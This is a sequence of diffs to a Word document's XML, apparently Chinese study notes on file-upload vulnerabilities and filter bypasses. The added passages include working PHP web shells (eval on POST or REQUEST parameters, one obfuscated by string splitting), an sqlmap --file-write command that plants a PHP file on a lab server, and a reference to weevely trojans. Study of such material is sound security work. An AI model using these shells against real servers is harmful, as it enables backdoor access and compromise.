--- a/3.fileUpload/文件上传笔记.docx
+++ b/3.fileUpload/文件上传笔记.docx
@@ -967,7 +967,15 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>阶段（只在</w:t>
+        <w:t>截断</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>（只在</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1002,9 +1010,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="3"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1121,9 +1126,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="1260"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2591,11 +2593,6 @@
     </w:p>
     <w:p/>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -2833,27 +2830,19 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
-          <w:strike w:val="0"/>
         </w:rPr>
         <w:t>xxx</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
-          <w:strike w:val="0"/>
         </w:rPr>
         <w:t>/</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:strike w:val="0"/>
-        </w:rPr>
         <w:t>x.php</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:strike w:val="0"/>
-        </w:rPr>
         <w:t xml:space="preserve">  </w:t>
       </w:r>
       <w:r>
@@ -2895,21 +2884,18 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
-          <w:strike w:val="0"/>
         </w:rPr>
         <w:t>（</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
-          <w:strike w:val="0"/>
         </w:rPr>
         <w:t>注意和下一节第一条的区别</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
-          <w:strike w:val="0"/>
         </w:rPr>
         <w:t>）</w:t>
       </w:r>
@@ -2917,9 +2903,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="840"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3206,16 +3189,7 @@
           <w:rFonts w:hint="eastAsia"/>
           <w:highlight w:val="green"/>
         </w:rPr>
-        <w:t>（待验证，不确定漏洞到底</w:t>
-      </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:highlight w:val="green"/>
-        </w:rPr>
-        <w:t>是</w:t>
+        <w:t>（待验证，不确定漏洞到底是</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3255,7 +3229,25 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>文件名以“</w:t>
+        <w:t>上传</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>.jpg</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>文件，访问时</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>以“</w:t>
       </w:r>
       <w:r>
         <w:t>/x.php</w:t>
@@ -5409,7 +5401,7 @@
   <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="437D624A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="BB2E8640"/>
+    <w:tmpl w:val="1C08C7C6"/>
     <w:lvl w:ilvl="0" w:tplc="1F6E383E">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
@@ -5420,7 +5412,7 @@
         <w:ind w:left="840" w:hanging="420"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl w:ilvl="1" w:tplc="C1707C48">
+    <w:lvl w:ilvl="1" w:tplc="B4CA2F5E">
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerLetter"/>
       <w:pStyle w:val="3"/>
@@ -6736,7 +6728,7 @@
     <w:link w:val="3Char"/>
     <w:autoRedefine/>
     <w:qFormat/>
-    <w:rsid w:val="00BD720F"/>
+    <w:rsid w:val="00A50539"/>
     <w:pPr>
       <w:numPr>
         <w:ilvl w:val="1"/>
@@ -6749,7 +6741,6 @@
     <w:rPr>
       <w:b w:val="0"/>
       <w:bCs/>
-      <w:strike/>
       <w:sz w:val="21"/>
     </w:rPr>
   </w:style>
@@ -6757,10 +6748,9 @@
     <w:name w:val="笔记3级标 Char"/>
     <w:basedOn w:val="a0"/>
     <w:link w:val="3"/>
-    <w:rsid w:val="00BD720F"/>
+    <w:rsid w:val="00A50539"/>
     <w:rPr>
       <w:bCs/>
-      <w:strike/>
       <w:kern w:val="44"/>
       <w:szCs w:val="44"/>
     </w:rPr>
@@ -7059,7 +7049,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{F51D8B85-FD54-4EE7-8CAA-0A6BE7AB5D42}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{99DE2F0B-A15F-4D7A-B0DC-1FE55254E752}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/3.fileUpload/文件上传笔记.docx
+++ b/3.fileUpload/文件上传笔记.docx
@@ -969,8 +969,6 @@
         </w:rPr>
         <w:t>截断</w:t>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -4723,6 +4721,91 @@
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
         <w:t>配置文件中打开或关闭。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>运行写一句话马</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>可以上传</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>php</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>，但是过滤危险函数时可以上传写一句话马的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>php</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>&lt;?php fputs(fopen('fff.php','w'),'&lt;?p</w:t>
+      </w:r>
+      <w:r>
+        <w:t>’.’</w:t>
+      </w:r>
+      <w:r>
+        <w:t>hp e</w:t>
+      </w:r>
+      <w:r>
+        <w:t>’.’</w:t>
+      </w:r>
+      <w:r>
+        <w:t>va</w:t>
+      </w:r>
+      <w:r>
+        <w:t>’.’</w:t>
+      </w:r>
+      <w:r>
+        <w:t>l($_P</w:t>
+      </w:r>
+      <w:r>
+        <w:t>’.’</w:t>
+      </w:r>
+      <w:r>
+        <w:t>O</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:t>ST[yzj])?&gt;');?&gt;</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
@@ -7049,7 +7132,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{99DE2F0B-A15F-4D7A-B0DC-1FE55254E752}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{CF4E368C-131B-4B5C-97B0-69ADD588AF83}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/3.fileUpload/文件上传笔记.docx
+++ b/3.fileUpload/文件上传笔记.docx
@@ -1156,9 +1156,6 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="14"/>
         </w:numPr>
-        <w:rPr>
-          <w:strike/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1169,48 +1166,39 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
-          <w:strike/>
         </w:rPr>
         <w:t>，</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
-          <w:strike/>
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
-          <w:strike/>
         </w:rPr>
         <w:t>后面</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:strike/>
-        </w:rPr>
         <w:t>的没测试</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
-          <w:strike/>
         </w:rPr>
         <w:t>)pht</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
-          <w:strike/>
         </w:rPr>
         <w:t>，</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
-          <w:strike/>
         </w:rPr>
         <w:t>phtml</w:t>
       </w:r>
@@ -4030,26 +4018,15 @@
         <w:t>下可以上传任意脚本。</w:t>
       </w:r>
     </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="10"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>注意点：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t>&lt;input type="hidden" value="100000" name="MAX_FILE_SIZE"&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="10"/>
@@ -4063,8 +4040,154 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:tab/>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>sqlmap:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:inline distT="0" distB="0" distL="0" distR="0">
+                <wp:extent cx="5259121" cy="1404620"/>
+                <wp:effectExtent l="0" t="0" r="17780" b="17780"/>
+                <wp:docPr id="2" name="文本框 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="5259121" cy="1404620"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:srgbClr val="000000"/>
+                          </a:solidFill>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:r>
+                              <w:t xml:space="preserve">python sqlmap.py -u </w:t>
+                            </w:r>
+                            <w:hyperlink r:id="rId9" w:history="1">
+                              <w:r>
+                                <w:rPr>
+                                  <w:rStyle w:val="a7"/>
+                                </w:rPr>
+                                <w:t>http://192.168.1.108/news.php?newsid=2</w:t>
+                              </w:r>
+                            </w:hyperlink>
+                          </w:p>
+                          <w:p>
+                            <w:r>
+                              <w:t>--file-write "D:/security/2.sql injection/sqlmap</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:t>project-sqlmap-7dbbf3e/frj.jpg"</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:r>
+                              <w:t>--file</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:t>-dest "C:/phpStudy/WWW/cms/510c</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:t>ms/upload/day_170704/frj.php"</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:spAutoFit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:inline>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape id="_x0000_s1027" type="#_x0000_t202" style="width:414.1pt;height:110.6pt;visibility:visible;mso-wrap-style:square;mso-left-percent:-10001;mso-top-percent:-10001;mso-position-horizontal:absolute;mso-position-horizontal-relative:char;mso-position-vertical:absolute;mso-position-vertical-relative:line;mso-left-percent:-10001;mso-top-percent:-10001;v-text-anchor:top" o:gfxdata="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">
+                <v:textbox style="mso-fit-shape-to-text:t">
+                  <w:txbxContent>
+                    <w:p>
+                      <w:r>
+                        <w:t xml:space="preserve">python sqlmap.py -u </w:t>
+                      </w:r>
+                      <w:hyperlink r:id="rId10" w:history="1">
+                        <w:r>
+                          <w:rPr>
+                            <w:rStyle w:val="a7"/>
+                          </w:rPr>
+                          <w:t>http://192.168.1.108/news.php?newsid=2</w:t>
+                        </w:r>
+                      </w:hyperlink>
+                    </w:p>
+                    <w:p>
+                      <w:r>
+                        <w:t>--file-write "D:/security/2.sql injection/sqlmap</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:t>project-sqlmap-7dbbf3e/frj.jpg"</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:r>
+                        <w:t>--file</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:t>-dest "C:/phpStudy/WWW/cms/510c</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:t>ms/upload/day_170704/frj.php"</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:anchorlock/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+      </w:pPr>
+      <w:r>
         <w:t>MySQL:</w:t>
       </w:r>
     </w:p>
@@ -4737,9 +4860,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -4767,11 +4887,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:tab/>
       </w:r>
@@ -4800,12 +4915,7 @@
         <w:t>’.’</w:t>
       </w:r>
       <w:r>
-        <w:t>O</w:t>
-      </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
-      <w:r>
-        <w:t>ST[yzj])?&gt;');?&gt;</w:t>
+        <w:t>OST[yzj])?&gt;');?&gt;</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
@@ -5484,8 +5594,8 @@
   <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="437D624A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="1C08C7C6"/>
-    <w:lvl w:ilvl="0" w:tplc="1F6E383E">
+    <w:tmpl w:val="93D4B34E"/>
+    <w:lvl w:ilvl="0" w:tplc="370050EA">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
       <w:pStyle w:val="2"/>
@@ -6208,6 +6318,12 @@
   </w:num>
   <w:num w:numId="20">
     <w:abstractNumId w:val="8"/>
+  </w:num>
+  <w:num w:numId="21">
+    <w:abstractNumId w:val="7"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
   </w:num>
 </w:numbering>
 </file>
@@ -6781,7 +6897,7 @@
     <w:link w:val="2Char"/>
     <w:autoRedefine/>
     <w:qFormat/>
-    <w:rsid w:val="00665036"/>
+    <w:rsid w:val="00682D3E"/>
     <w:pPr>
       <w:numPr>
         <w:numId w:val="10"/>
@@ -6797,7 +6913,7 @@
     <w:name w:val="笔记2级标题 Char"/>
     <w:basedOn w:val="a0"/>
     <w:link w:val="2"/>
-    <w:rsid w:val="00665036"/>
+    <w:rsid w:val="00682D3E"/>
     <w:rPr>
       <w:b/>
       <w:kern w:val="44"/>
@@ -6861,6 +6977,17 @@
     <w:rPr>
       <w:sz w:val="18"/>
       <w:szCs w:val="18"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="a7">
+    <w:name w:val="Hyperlink"/>
+    <w:basedOn w:val="a0"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00353F4D"/>
+    <w:rPr>
+      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
+      <w:u w:val="single"/>
     </w:rPr>
   </w:style>
 </w:styles>
@@ -7132,7 +7259,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{CF4E368C-131B-4B5C-97B0-69ADD588AF83}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{646C45C7-B469-42E4-B8EC-2C2E2ABF3CAB}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/3.fileUpload/文件上传笔记.docx
+++ b/3.fileUpload/文件上传笔记.docx
@@ -4018,15 +4018,7 @@
         <w:t>下可以上传任意脚本。</w:t>
       </w:r>
     </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
-    </w:p>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="10"/>
@@ -4443,6 +4435,45 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>使用</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>weevely</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>生成木马</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>refer:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> http://www.freebuf.com/sectool/39765.html</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="10"/>
       </w:pPr>
       <w:r>
@@ -4854,6 +4885,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>运行写一句话马</w:t>
       </w:r>
     </w:p>
@@ -7259,7 +7291,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{646C45C7-B469-42E4-B8EC-2C2E2ABF3CAB}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{6D4497D7-A672-49BA-B49C-5E7693E2F905}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/3.fileUpload/文件上传笔记.docx
+++ b/3.fileUpload/文件上传笔记.docx
@@ -4458,19 +4458,12 @@
     </w:p>
     <w:p/>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:t>refer:</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> http://www.freebuf.com/sectool/39765.html</w:t>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4780,7 +4773,15 @@
         <w:ind w:left="1260" w:firstLine="420"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">&lt;script language="php"&gt; ... &lt;/script&gt; </w:t>
+        <w:t>&lt;script language="php"&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:t>eval($_REQUEST[yzj]);</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:t xml:space="preserve"> &lt;/script&gt; </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7291,7 +7292,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{6D4497D7-A672-49BA-B49C-5E7693E2F905}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{5C9BAB8E-65C0-4B05-B5DE-A4C9BC344434}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>
